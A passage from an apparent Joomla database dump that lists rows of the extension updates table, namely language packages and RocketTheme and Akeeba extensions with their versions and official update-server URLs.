CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2036,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2037,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2038,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2039,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2040,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2041,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2042,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2043,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2044,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2045,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(2046,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(2047,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(2048,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2049,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2050,57,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2051,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2052,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2053,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2054,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2055,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2056,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2057,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2058,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2059,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2060,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2061,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2062,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2063,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2064,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2065,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2066,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2067,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2068,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2069,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2070,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2071,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2072,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2073,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2074,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2075,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2076,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2077,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2078,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2079,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2080,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2081,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2082,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2083,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2084,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2085,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2086,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2087,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2088,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2089,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2090,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2091,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(2092,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2093,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2094,3,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2095,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2096,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2097,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2098,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2099,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2100,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2101,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2102,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2103,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2104,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2105,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2106,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2107,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2108,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2109,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2110,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2111,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2112,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2113,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2114,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2115,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2116,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2117,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2118,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2119,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2120,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2121,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2122,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2123,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2124,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2125,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2126,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2127,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2128,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2129,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2130,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2131,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2132,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2133,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2134,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2135,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(2136,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(2137,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(2138,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2139,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2140,57,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2141,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2142,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2143,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2144,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2145,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2146,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2147,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2148,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2149,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2150,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2151,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2152,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2153,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2154,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2155,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2156,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2157,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2158,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2159,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2160,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2161,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2162,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2163,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2164,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2165,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2166,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2167,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2168,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2169,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2170,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2171,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2172,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2173,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2174,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2175,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2176,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2177,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2178,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2179,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2180,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2181,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(2182,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2183,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2184,3,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2185,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2186,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2187,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2188,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2189,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2190,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2191,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2192,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2193,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2194,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2195,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2196,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2197,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2198,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2199,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2200,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2201,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2202,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2203,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2204,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2205,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2206,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2207,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2208,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2209,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2210,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2211,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2212,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2213,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2214,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2215,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2216,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2217,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2218,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2219,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2220,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2221,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2222,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2223,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2224,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2225,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(2226,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(2227,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(2228,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2229,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2230,57,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2231,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2232,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2233,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2234,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2235,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2236,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2237,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2238,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2239,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2240,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2241,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2242,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2243,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2244,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2245,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2246,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2247,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2248,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2249,57,0,'English 